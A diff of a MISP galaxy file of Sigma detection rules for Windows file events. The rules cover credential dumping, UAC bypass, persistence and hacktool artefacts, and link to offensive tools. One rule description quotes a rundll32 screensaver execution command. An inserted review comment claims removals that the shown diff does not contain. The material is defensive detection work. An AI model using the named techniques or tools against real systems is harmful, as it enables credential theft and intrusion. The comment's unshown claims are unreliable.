+ "https://github.com/samratashok/nishang/blob/414ee1104526d7057f9adaeee196d91ae447283e/Gather/Copy-VSS.ps1",
 "https://www.n00py.io/2022/03/manipulating-user-passwords-without-mimikatz/",
+ "https://pentestlab.blog/tag/ntds-dit/",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_ntds_dit_uncommon_parent_process.yml"
 ],
 "tags": [
@@ -37310,11 +37735,11 @@
 "logsource.category": "file_event",
 "logsource.product": "windows",
 "refs": [
- "https://twitter.com/luc4m/status/1073181154126254080",
- "https://www.crowdstrike.com/blog/meet-crowdstrikes-adversary-of-the-month-for-june-mustang-panda/",
 "https://twitter.com/malwrhunterteam/status/1235135745611960321",
- "https://www.cybereason.com/blog/research/a-bazar-of-tricks-following-team9s-development-cycles",
+ "https://twitter.com/luc4m/status/1073181154126254080",
 "https://www.anomali.com/blog/china-based-apt-mustang-panda-targets-minority-groups-public-and-private-sector-organizations",
+ "https://www.cybereason.com/blog/research/a-bazar-of-tricks-following-team9s-development-cycles",
+ "https://www.crowdstrike.com/blog/meet-crowdstrikes-adversary-of-the-month-for-june-mustang-panda/",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_susp_double_extension.yml"
 ],
 "tags": [
@@ -37380,10 +37805,10 @@
 "logsource.category": "file_event",
 "logsource.product": "windows",
 "refs": [
- "https://learn.microsoft.com/en-us/sysinternals/downloads/process-explorer",
- "https://www.elastic.co/security-labs/stopping-vulnerable-driver-attacks",
 "https://github.com/Yaxser/Backstab",
+ "https://www.elastic.co/security-labs/stopping-vulnerable-driver-attacks",
 "https://news.sophos.com/en-us/2023/04/19/aukill-edr-killer-malware-abuses-process-explorer-driver/",
+ "https://learn.microsoft.com/en-us/sysinternals/downloads/process-explorer",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_sysinternals_procexp_driver_susp_creation.yml"
 ],
 "tags": [
@@ -37483,8 +37908,8 @@
 "logsource.category": "file_event",
 "logsource.product": "windows",
 "refs": [
- "https://github.com/SecureAuthCorp/impacket/blob/master/examples/secretsdump.py",
 "https://github.com/Porchetta-Industries/CrackMapExec",
+ "https://github.com/SecureAuthCorp/impacket/blob/master/examples/secretsdump.py",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_hktl_remote_cred_dump.yml"
 ],
 "tags": [
@@ -37520,8 +37945,20 @@
 "Internal Research",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_shell_write_susp_directory.yml"
 ],
- "tags": "No established tags"
+ "tags": [
+ "attack.execution",
+ "attack.t1059"
+ ]
 },
+ "related": [
+ {
+ "dest-uuid": "7385dfaf-6886-4229-9ecd-6fd678040830",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "related-to"
+ }
+ ],
 "uuid": "1277f594-a7d1-4f28-a2d3-73af5cbeab43",
 "value": "Windows Shell/Scripting Application File Write to Suspicious Folder"
 },
@@ -37541,8 +37978,28 @@
 "WScript or CScript Dropper (cea72823-df4d-4567-950c-0b579eaf0846)",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_cscript_wscript_dropper.yml"
 ],
- "tags": "No established tags"
+ "tags": [
+ "attack.execution",
+ "attack.t1059.005",
+ "attack.t1059.007"
+ ]
 },
+ "related": [
+ {
+ "dest-uuid": "dfd7cc1d-e1d8-4394-a198-97c4cab8aa67",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "related-to"
+ },
+ {
+ "dest-uuid": "0f4a0c76-ab2d-4cb0-85d3-3f0efb8cba0d",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "related-to"
+ }
+ ],
 "uuid": "002bdb95-0cf1-46a6-9e08-d38c128a6127",
 "value": "WScript or CScript Dropper - File"
 },
@@ -37559,8 +38016,8 @@
 "logsource.category": "file_event",
 "logsource.product": "windows",
 "refs": [
- "https://labs.withsecure.com/publications/add-in-opportunities-for-office-persistence",
 "Internal Research",
+ "https://labs.withsecure.com/publications/add-in-opportunities-for-office-persistence",
 "https://github.com/redcanaryco/atomic-red-team/blob/4ae9580a1a8772db87a1b6cdb0d03e5af231e966/atomics/T1137.006/T1137.006.md",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_office_addin_persistence.yml"
 ],
@@ -37627,9 +38084,9 @@
 "logsource.category": "file_event",
 "logsource.product": "windows",
 "refs": [
- "https://answers.microsoft.com/en-us/msoffice/forum/all/document-in-word-startup-folder-doesnt-open-when/44ab0932-2917-4150-8cdc-2f2cf39e86f3",
- "https://app.any.run/tasks/d6fe6624-6ef8-485d-aa75-3d1bdda2a08c/",
 "https://en.wikipedia.org/wiki/List_of_Microsoft_Office_filename_extensions",
+ "https://app.any.run/tasks/d6fe6624-6ef8-485d-aa75-3d1bdda2a08c/",
+ "https://answers.microsoft.com/en-us/msoffice/forum/all/document-in-word-startup-folder-doesnt-open-when/44ab0932-2917-4150-8cdc-2f2cf39e86f3",
 "http://addbalance.com/word/startup.htm",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_office_uncommon_file_startup.yml"
 ],
@@ -37686,8 +38143,8 @@
 "logsource.category": "file_event",
 "logsource.product": "windows",
 "refs": [
- "https://medium.com/@SumitVerma101/windows-privilege-escalation-part-1-unquoted-service-path-c7a011a8d8ae",
 "https://app.any.run/tasks/76c69e2d-01e8-49d9-9aea-fb7cc0c4d3ad/",
+ "https://medium.com/@SumitVerma101/windows-privilege-escalation-part-1-unquoted-service-path-c7a011a8d8ae",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_susp_executable_creation.yml"
 ],
 "tags": [
@@ -37762,9 +38219,9 @@
 "logsource.category": "file_event",
 "logsource.product": "windows",
 "refs": [
- "https://github.com/hhlxf/PrintNightmare",
 "https://github.com/cube0x0/CVE-2021-1675",
 "https://github.com/afwu/PrintNightmare",
+ "https://github.com/hhlxf/PrintNightmare",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_cve_2021_1675_printspooler.yml"
 ],
 "tags": [
@@ -37848,10 +38305,10 @@
 "logsource.category": "file_event",
 "logsource.product": "windows",
 "refs": [
- "https://learn.microsoft.com/en-us/office/vba/outlook/concepts/outlook-forms/create-an-outlook-form",
- "https://www.slipstick.com/developer/custom-form/clean-outlooks-forms-cache/",
- "https://speakerdeck.com/heirhabarov/hunting-for-persistence-via-microsoft-exchange-server-or-outlook?slide=79",
 "https://speakerdeck.com/heirhabarov/hunting-for-persistence-via-microsoft-exchange-server-or-outlook?slide=76",
+ "https://learn.microsoft.com/en-us/office/vba/outlook/concepts/outlook-forms/create-an-outlook-form",
+ "https://speakerdeck.com/heirhabarov/hunting-for-persistence-via-microsoft-exchange-server-or-outlook?slide=79",
+ "https://www.slipstick.com/developer/custom-form/clean-outlooks-forms-cache/",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_office_outlook_newform.yml"
 ],
 "tags": [
@@ -37963,8 +38420,8 @@
 "logsource.category": "file_event",
 "logsource.product": "windows",
 "refs": [
- "https://grzegorztworek.medium.com/using-uefi-to-inject-executable-files-into-bitlocker-protected-drives-8ff4ca59c94c",
 "https://persistence-info.github.io/Data/wpbbin.html",
+ "https://grzegorztworek.medium.com/using-uefi-to-inject-executable-files-into-bitlocker-protected-drives-8ff4ca59c94c",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_wpbbin_persistence.yml"
 ],
 "tags": [
@@ -38287,11 +38744,11 @@
 "logsource.category": "file_event",
 "logsource.product": "windows",
 "refs": [
- "https://www.fireeye.com/blog/threat-research/2020/05/tactics-techniques-procedures-associated-with-maze-ransomware-incidents.html",
- "https://assets.documentcloud.org/documents/20444693/fbi-pin-egregor-ransomware-bc-01062021.pdf",
- "https://labs.f-secure.com/blog/prelude-to-ransomware-systembc",
- "https://thedfirreport.com/2021/01/18/all-that-for-a-coinminer",
 "https://news.sophos.com/en-us/2019/12/09/snatch-ransomware-reboots-pcs-into-safe-mode-to-bypass-protection/",
+ "https://labs.f-secure.com/blog/prelude-to-ransomware-systembc",
+ "https://assets.documentcloud.org/documents/20444693/fbi-pin-egregor-ransomware-bc-01062021.pdf",
+ "https://www.fireeye.com/blog/threat-research/2020/05/tactics-techniques-procedures-associated-with-maze-ransomware-incidents.html",
+ "https://thedfirreport.com/2021/01/18/all-that-for-a-coinminer",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_advanced_ip_scanner.yml"
 ],
 "tags": [
@@ -38358,26 +38815,26 @@
 "logsource.category": "file_event",
 "logsource.product": "windows",
 "refs": [
- "https://github.com/HarmJ0y/DAMP",
- "https://github.com/CsEnox/EventViewer-UACBypass",
- "https://github.com/dafthack/DomainPasswordSpray/blob/b13d64a5834694aa73fd2aea9911a83027c465a7/DomainPasswordSpray.ps1",
- "https://unit42.paloaltonetworks.com/threat-assessment-black-basta-ransomware/",
- "https://github.com/adrecon/ADRecon",
- "https://github.com/BC-SECURITY/Invoke-ZeroLogon/blob/111d17c7fec486d9bb23387e2e828b09a26075e4/Invoke-ZeroLogon.ps1",
- "https://research.nccgroup.com/2022/06/06/shining-the-light-on-black-basta/",
- "https://github.com/NetSPI/PowerUpSQL",
- "https://github.com/nettitude/Invoke-PowerThIEf",
- "https://github.com/rvrsh3ll/Misc-Powershell-Scripts/blob/6f23bb41f9675d7e2d32bacccff75e931ae00554/OfficeMemScraper.ps1",
- "https://github.com/AlsidOfficial/WSUSpendu/",
- "https://github.com/samratashok/nishang",
- "https://github.com/PowerShellMafia/PowerSploit",
- "https://github.com/xorrior/RandomPS-Scripts/blob/848c919bfce4e2d67b626cbcf4404341cfe3d3b6/Get-DXWebcamVideo.ps1",
- "https://github.com/besimorhino/powercat",
- "https://github.com/S3cur3Th1sSh1t/WinPwn",
- "https://github.com/DarkCoderSc/PowerRunAsSystem/",
- "https://github.com/adrecon/AzureADRecon",
 "https://github.com/S3cur3Th1sSh1t/PowerSharpPack/tree/master/PowerSharpBinaries",
+ "https://github.com/S3cur3Th1sSh1t/WinPwn",
+ "https://research.nccgroup.com/2022/06/06/shining-the-light-on-black-basta/",
+ "https://github.com/adrecon/ADRecon",
+ "https://github.com/samratashok/nishang",
 "https://github.com/Kevin-Robertson/Powermad",
+ "https://github.com/HarmJ0y/DAMP",
+ "https://github.com/DarkCoderSc/PowerRunAsSystem/",
+ "https://github.com/CsEnox/EventViewer-UACBypass",
+ "https://github.com/nettitude/Invoke-PowerThIEf",
+ "https://github.com/AlsidOfficial/WSUSpendu/",
+ "https://github.com/besimorhino/powercat",
+ "https://github.com/BC-SECURITY/Invoke-ZeroLogon/blob/111d17c7fec486d9bb23387e2e828b09a26075e4/Invoke-ZeroLogon.ps1",
+ "https://github.com/adrecon/AzureADRecon",
+ "https://github.com/rvrsh3ll/Misc-Powershell-Scripts/blob/6f23bb41f9675d7e2d32bacccff75e931ae00554/OfficeMemScraper.ps1",
+ "https://github.com/dafthack/DomainPasswordSpray/blob/b13d64a5834694aa73fd2aea9911a83027c465a7/DomainPasswordSpray.ps1",
+ "https://github.com/xorrior/RandomPS-Scripts/blob/848c919bfce4e2d67b626cbcf4404341cfe3d3b6/Get-DXWebcamVideo.ps1",
+ "https://github.com/PowerShellMafia/PowerSploit",
+ "https://unit42.paloaltonetworks.com/threat-assessment-black-basta-ransomware/",
+ "https://github.com/NetSPI/PowerUpSQL",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_powershell_exploit_scripts.yml"
 ],
 "tags": [
@@ -38719,8 +39176,8 @@
 "logsource.category": "file_event",
 "logsource.product": "windows",
 "refs": [
- "https://persistence-info.github.io/Data/powershellprofile.html",
 "https://www.welivesecurity.com/2019/05/29/turla-powershell-usage/",
+ "https://persistence-info.github.io/Data/powershellprofile.html",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_susp_powershell_profile.yml"
 ],
 "tags": [
@@ -38822,8 +39279,8 @@
 "logsource.category": "file_event",
 "logsource.product": "windows",
 "refs": [
- "https://insight-jp.nttsecurity.com/post/102hojk/operation-restylink-apt-campaign-targeting-japanese-companies",
 "https://learn.microsoft.com/en-us/office/troubleshoot/excel/use-startup-folders",
+ "https://insight-jp.nttsecurity.com/post/102hojk/operation-restylink-apt-campaign-targeting-japanese-companies",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_office_startup_persistence.yml"
 ],
 "tags": [
@@ -38856,8 +39313,8 @@
 "logsource.category": "file_event",
 "logsource.product": "windows",
 "refs": [
- "https://blog.thickmints.dev/mintsights/detecting-rogue-rdp/",
 "https://www.blackhillsinfosec.com/rogue-rdp-revisiting-initial-access-methods/",
+ "https://blog.thickmints.dev/mintsights/detecting-rogue-rdp/",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_rdp_file_susp_creation.yml"
 ],
 "tags": [
@@ -38880,8 +39337,8 @@
 "logsource.category": "file_event",
 "logsource.product": "windows",
 "refs": [
- "https://thedfirreport.com/2022/06/06/will-the-real-msiexec-please-stand-up-exploit-leads-to-data-exfiltration/",
 "https://github.com/horizon3ai/CVE-2021-44077/blob/b7a48e25824e8ead95e028475c7fd0e107e6e6bf/exploit.py",
+ "https://thedfirreport.com/2022/06/06/will-the-real-msiexec-please-stand-up-exploit-leads-to-data-exfiltration/",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_cve_2021_44077_poc_default_files.yml"
 ],
 "tags": [
@@ -39173,10 +39630,10 @@
 "logsource.category": "file_event",
 "logsource.product": "windows",
 "refs": [
- "https://bohops.com/2021/03/16/investigating-net-clr-usage-log-tampering-techniques-for-edr-evasion/",
 "https://github.com/olafhartong/sysmon-modular/blob/fa1ae53132403d262be2bbd7f17ceea7e15e8c78/11_file_create/include_dotnet.xml",
 "https://blog.menasec.net/2019/07/interesting-difr-traces-of-net-clr.html",
 "https://web.archive.org/web/20221026202428/https://gist.github.com/code-scrap/d7f152ffcdb3e0b02f7f394f5187f008",
+ "https://bohops.com/2021/03/16/investigating-net-clr-usage-log-tampering-techniques-for-edr-evasion/",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_net_cli_artefact.yml"
 ],
 "tags": [
@@ -39210,8 +39667,8 @@
 "logsource.product": "windows",
 "refs": [
 "https://thedfirreport.com/2020/11/23/pysa-mespinoza-ransomware/",
- "https://github.com/Kevin-Robertson/Inveigh/blob/29d9e3c3a625b3033cdaf4683efaafadcecb9007/Inveigh/Support/Control.cs",
 "https://github.com/Kevin-Robertson/Inveigh/blob/29d9e3c3a625b3033cdaf4683efaafadcecb9007/Inveigh/Support/Output.cs",
+ "https://github.com/Kevin-Robertson/Inveigh/blob/29d9e3c3a625b3033cdaf4683efaafadcecb9007/Inveigh/Support/Control.cs",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_hktl_inveigh_artefacts.yml"
 ],
 "tags": [
@@ -39244,9 +39701,9 @@
 "logsource.category": "file_event",
 "logsource.product": "windows",
 "refs": [
- "https://twitter.com/orange_8361/status/1518970259868626944?s=20&t=RFXqZjtA7tWM3HxqEH78Aw",
 "https://twitter.com/splinter_code/status/1519075134296006662?s=12&t=DLUXH86WtcmG_AZ5gY3C6g",
 "https://lolbas-project.github.io/lolbas/Binaries/Eventvwr/#execute",
+ "https://twitter.com/orange_8361/status/1518970259868626944?s=20&t=RFXqZjtA7tWM3HxqEH78Aw",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_uac_bypass_eventvwr.yml"
 ],
 "tags": [
@@ -39303,8 +39760,8 @@
 "logsource.category": "file_event",
 "logsource.product": "windows",
 "refs": [
- "https://www.first.org/resources/papers/conf2017/Advanced-Incident-Detection-and-Threat-Hunting-using-Sysmon-and-Splunk.pdf",
 "https://www.hybrid-analysis.com/sample/ba86fa0d4b6af2db0656a88b1dd29f36fe362473ae8ad04255c4e52f214a541c?environmentId=100",
+ "https://www.first.org/resources/papers/conf2017/Advanced-Incident-Detection-and-Threat-Hunting-using-Sysmon-and-Splunk.pdf",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_mal_adwind.yml"
 ],
 "tags": [
@@ -39345,8 +39802,8 @@
 "logsource.category": "file_event",
 "logsource.product": "windows",
 "refs": [
- "https://github.com/outflanknl/Dumpert",
 "https://unit42.paloaltonetworks.com/actors-still-exploiting-sharepoint-vulnerability/",
+ "https://github.com/outflanknl/Dumpert",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_hktl_dumpert.yml"
 ],
 "tags": [
@@ -39379,8 +39836,8 @@
 "logsource.category": "file_event",
 "logsource.product": "windows",
 "refs": [
- "https://github.com/deepinstinct/Lsass-Shtinkering",
 "https://media.defcon.org/DEF%20CON%2030/DEF%20CON%2030%20presentations/Asaf%20Gilboa%20-%20LSASS%20Shtinkering%20Abusing%20Windows%20Error%20Reporting%20to%20Dump%20LSASS.pdf",
+ "https://github.com/deepinstinct/Lsass-Shtinkering",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_lsass_shtinkering.yml"
 ],
 "tags": [
@@ -39480,8 +39937,8 @@
 "logsource.category": "file_event",
 "logsource.product": "windows",
 "refs": [
- "https://cobalt.io/blog/kerberoast-attack-techniques",
 "https://pentestlab.blog/2019/10/21/persistence-security-support-provider/",
+ "https://cobalt.io/blog/kerberoast-attack-techniques",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_hktl_mimikatz_files.yml"
 ],
 "tags": [
@@ -39722,8 +40179,8 @@
 "logsource.category": "file_event",
 "logsource.product": "windows",
 "refs": [
- "https://docs.microsoft.com/en-us/deployoffice/compat/office-file-format-reference",
 "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1566.001/T1566.001.md",
+ "https://docs.microsoft.com/en-us/deployoffice/compat/office-file-format-reference",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_office_macro_files_from_susp_process.yml"
 ],
 "tags": [
@@ -39789,8 +40246,8 @@
 "logsource.category": "file_event",
 "logsource.product": "windows",
 "refs": [
- "https://github.com/OTRF/ThreatHunter-Playbook/blob/2d4257f630f4c9770f78d0c1df059f891ffc3fec/docs/evals/apt29/detections/5.B.1_611FCA99-97D0-4873-9E51-1C1BA2DBB40D.md",
 "https://github.com/OTRF/detection-hackathon-apt29/issues/12",
+ "https://github.com/OTRF/ThreatHunter-Playbook/blob/2d4257f630f4c9770f78d0c1df059f891ffc3fec/docs/evals/apt29/detections/5.B.1_611FCA99-97D0-4873-9E51-1C1BA2DBB40D.md",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_startup_folder_file_write.yml"
 ],
 "tags": [
@@ -39896,8 +40353,20 @@
 "https://jpcertcc.github.io/ToolAnalysisResultSheet/details/PowerSploit_Invoke-Mimikatz.htm",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_susp_system_interactive_powershell.yml"
 ],
- "tags": "No established tags"
+ "tags": [
+ "attack.execution",
+ "attack.t1059.001"
+ ]
 },
+ "related": [
+ {
+ "dest-uuid": "970a3432-3237-47ad-bcca-7d8cbb217736",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "related-to"
+ }
+ ],
 "uuid": "5b40a734-99b6-4b98-a1d0-1cea51a08ab2",
 "value": "Suspicious Interactive PowerShell as SYSTEM"
 },
@@ -39982,8 +40451,8 @@
 "logsource.category": "file_event",
 "logsource.product": "windows",
 "refs": [
- "https://labs.sentinelone.com/living-off-windows-land-a-new-native-file-downldr/",
 "https://twitter.com/SBousseaden/status/1278977301745741825",
+ "https://labs.sentinelone.com/living-off-windows-land-a-new-native-file-downldr/",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_susp_desktopimgdownldr_file.yml"
 ],
 "tags": [
@@ -40050,8 +40519,8 @@
 "logsource.category": "file_event",
 "logsource.product": "windows",
 "refs": [
- "https://learn.microsoft.com/en-us/powershell/scripting/developer/module/understanding-a-windows-powershell-module?view=powershell-7.3",
 "Internal Research",
+ "https://learn.microsoft.com/en-us/powershell/scripting/developer/module/understanding-a-windows-powershell-module?view=powershell-7.3",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_powershell_module_susp_creation.yml"
 ],
 "tags": [
@@ -40074,11 +40543,11 @@
 "logsource.category": "file_event",
 "logsource.product": "windows",
 "refs": [
- "https://github.com/search?q=CVE-2021-36934",
- "https://github.com/FireFart/hivenightmare",
- "https://www.google.com/search?q=%22reg.exe+save%22+sam",
 "https://github.com/HuskyHacks/ShadowSteal",
+ "https://github.com/search?q=CVE-2021-36934",
 "https://github.com/cube0x0/CVE-2021-36934",
+ "https://www.google.com/search?q=%22reg.exe+save%22+sam",
+ "https://github.com/FireFart/hivenightmare",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_sam_dump.yml"
 ],
 "tags": [
@@ -40716,44 +41185,22 @@
 "Internal Research",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_shell_write_susp_files_extensions.yml"
 ],
- "tags": "No established tags"
- },
- "uuid": "b8fd0e93-ff58-4cbd-8f48-1c114e342e62",
- "value": "Windows Binaries Write Suspicious Extensions"
- },
- {
- "description": "LSASS memory dump creation using operating systems utilities. Procdump will use process name in output file if no name is specified",
- "meta": {
- "author": "Teymur Kheirkhabarov, oscd.community",
- "creation_date": "2019/10/22",
- "falsepositive": [
- "Dumping lsass memory for forensic investigation purposes by legitimate incident responder or forensic invetigator",
- "Dumps of another process that contains lsass in its process name (substring)"
- ],
- "filename": "file_event_win_lsass_memory_dump_file_creation.yml",
- "level": "high",
- "logsource.category": "file_event",
- "logsource.product": "windows",
- "refs": [
- "https://www.slideshare.net/heirhabarov/hunting-for-credentials-dumping-in-windows-environment",
- "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_lsass_memory_dump_file_creation.yml"
- ],
 "tags": [
- "attack.credential_access",
- "attack.t1003.001"
+ "attack.defense_evasion",
+ "attack.t1036"
 ]
 },
 "related": [
 {
- "dest-uuid": "65f2d882-3f41-4d48-8a06-29af77ec9f90",
+ "dest-uuid": "42e8de7b-37b2-4258-905a-6897815e58e0",
 "tags": [
 "estimative-language:likelihood-probability=\"almost-certain\""
 ],
 "type": "related-to"
 }
 ],
- "uuid": "5e3d3601-0662-4af0-b1d2-36a05e90c40a",
- "value": "LSASS Memory Dump File Creation"
+ "uuid": "b8fd0e93-ff58-4cbd-8f48-1c114e342e62",
+ "value": "Windows Binaries Write Suspicious Extensions"
 },
 {
 "description": "Detects the creation of recent element file that points to an .ISO, .IMG, .VHD or .VHDX file as often used in phishing attacks.\nThis can be a false positive on server systems but on workstations users should rarely mount 
.iso or .img files.\n",
@@ -40770,12 +41217,24 @@
 "refs": [
 "https://www.microsoft.com/security/blog/2021/05/27/new-sophisticated-email-based-attack-from-nobelium/",
 "https://blog.emsisoft.com/en/32373/beware-new-wave-of-malware-spreads-via-iso-file-email-attachments/",
- "https://insights.sei.cmu.edu/blog/the-dangers-of-vhd-and-vhdx-files/",
 "https://www.trendmicro.com/vinfo/us/security/news/cybercrime-and-digital-threats/malicious-spam-campaign-uses-iso-image-files-to-deliver-lokibot-and-nanocore",
+ "https://insights.sei.cmu.edu/blog/the-dangers-of-vhd-and-vhdx-files/",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_iso_file_recent.yml"
 ],
- "tags": "No established tags"
+ "tags": [
+ "attack.initial_access",
+ "attack.t1566.001"
+ ]
 },
+ "related": [
+ {
+ "dest-uuid": "2e34237d-8574-43f6-aace-ae2915de8597",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "related-to"
+ }
+ ],
 "uuid": "4358e5a5-7542-4dcb-b9f3-87667371839b",
 "value": "ISO or Image Mount Indicator in Recent Files"
 },
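Review bot: The `LSASS Memory Dump File Creation` element (uuid `5e3d3601-0662-4af0-b1d2-36a05e90c40a`) is dropped from the cluster outright in the hunk that starts at line 161, and the same happens to `Suspicious Execution of Taskkill` (uuid `86085955-ea48-42a2-9dd3-85d4c36b167d`) at line 178 and `Potential Credential Dumping Via LSASS Process Clone` (uuid `c8da0dfd-4ed0-4b68-962d-13c9c884384e`) at line 181. Any MISP event or other galaxy that already carries one of these UUIDs as a tag will no longer resolve to an element after this update, so the credential-dumping detection context silently disappears from existing analyses. Presumably the rules were deprecated or renamed upstream; if so, retaining the element with a short deprecation note at the start of its `description` keeps the UUID resolvable, and the commit message should at least list the removed UUIDs so downstream instances can audit the impact.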
@@ -41074,6 +41533,39 @@
 "uuid": "d353dac0-1b41-46c2-820c-d7d2561fc6ed",
 "value": "AWL Bypass with Winrm.vbs and Malicious WsmPty.xsl/WsmTxt.xsl - File"
 },
+ {
+ "description": "Detects the creation of screensaver files (.scr) outside of system folders. Attackers may execute an application as an \".SCR\" file using \"rundll32.exe desk.cpl,InstallScreenSaver\" for example.",
+ "meta": {
+ "author": "Christopher Peacock @securepeacock, SCYTHE @scythe_io",
+ "creation_date": "2022/04/27",
+ "falsepositive": [
+ "The installation of new screen savers by third party software"
+ ],
+ "filename": "file_event_win_new_scr_file.yml",
+ "level": "medium",
+ "logsource.category": "file_event",
+ "logsource.product": "windows",
+ "refs": [
+ "https://lolbas-project.github.io/lolbas/Libraries/Desk/",
+ "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_new_scr_file.yml"
+ ],
+ "tags": [
+ "attack.defense_evasion",
+ "attack.t1218.011"
+ ]
+ },
+ "related": [
+ {
+ "dest-uuid": "045d0922-2310-4e60-b5e4-3302302cb3c5",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "related-to"
+ }
+ ],
+ "uuid": "c048f047-7e2a-4888-b302-55f509d4a91d",
+ "value": "SCR File Write Event"
+ },
 {
 "description": "Detects the creation of a new office macro files on the systems via an application (browser, mail client).",
 "meta": {
@@ -41088,8 +41580,8 @@
 "logsource.category": "file_event",
 "logsource.product": "windows",
 "refs": [
- "https://docs.microsoft.com/en-us/deployoffice/compat/office-file-format-reference",
 "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1566.001/T1566.001.md",
+ "https://docs.microsoft.com/en-us/deployoffice/compat/office-file-format-reference",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_office_macro_files_downloaded.yml"
 ],
 "tags": [
@@ -41122,10 +41614,10 @@
 "logsource.category": "file_event",
 "logsource.product": "windows",
 "refs": [
+ "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1546.011/T1546.011.md#atomic-test-2---new-shim-database-files-created-in-the-default-shim-database-directory",
 "https://andreafortuna.org/2018/11/12/process-injection-and-persistence-using-application-shimming/",
 "https://liberty-shell.com/sec/2020/02/25/shim-persistence/",
 "https://www.mandiant.com/resources/blog/fin7-shim-databases-persistence",
- "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1546.011/T1546.011.md#atomic-test-2---new-shim-database-files-created-in-the-default-shim-database-directory",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_creation_new_shim_database.yml"
 ],
 "tags": [
@@ -41191,8 +41683,8 @@
 "logsource.category": "file_event",
 "logsource.product": "windows",
 "refs": [
- "https://www.joesandbox.com/analysis/465533/0/html",
 "https://blog.malwarebytes.com/threat-intelligence/2022/04/colibri-loader-combines-task-scheduler-and-powershell-in-clever-persistence-technique/",
+ "https://www.joesandbox.com/analysis/465533/0/html",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_susp_get_variable.yml"
 ],
 "tags": [
@@ -41267,8 +41759,8 @@
 "logsource.category": "file_event",
 "logsource.product": "windows",
 "refs": [
- "https://docs.microsoft.com/en-us/deployoffice/compat/office-file-format-reference",
 "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1566.001/T1566.001.md",
+ "https://docs.microsoft.com/en-us/deployoffice/compat/office-file-format-reference",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_office_macro_files_created.yml"
 ],
 "tags": [
@@ -41388,39 +41880,6 @@
 "uuid": "847def9e-924d-4e90-b7c4-5f581395a2b4",
 "value": "QuarksPwDump Dump File"
 },
- {
- "description": "Detects the creation of screensaver files (.scr) outside of system folders. Attackers may execute an application as an \".SCR\" file using \"rundll32.exe desk.cpl,InstallScreenSaver\" for example.",
- "meta": {
- "author": "Christopher Peacock @securepeacock, SCYTHE @scythe_io",
- "creation_date": "2022/04/27",
- "falsepositive": [
- "The installation of new screen savers by third party software"
- ],
- "filename": "file_event_win_new_src_file.yml",
- "level": "medium",
- "logsource.category": "file_event",
- "logsource.product": "windows",
- "refs": [
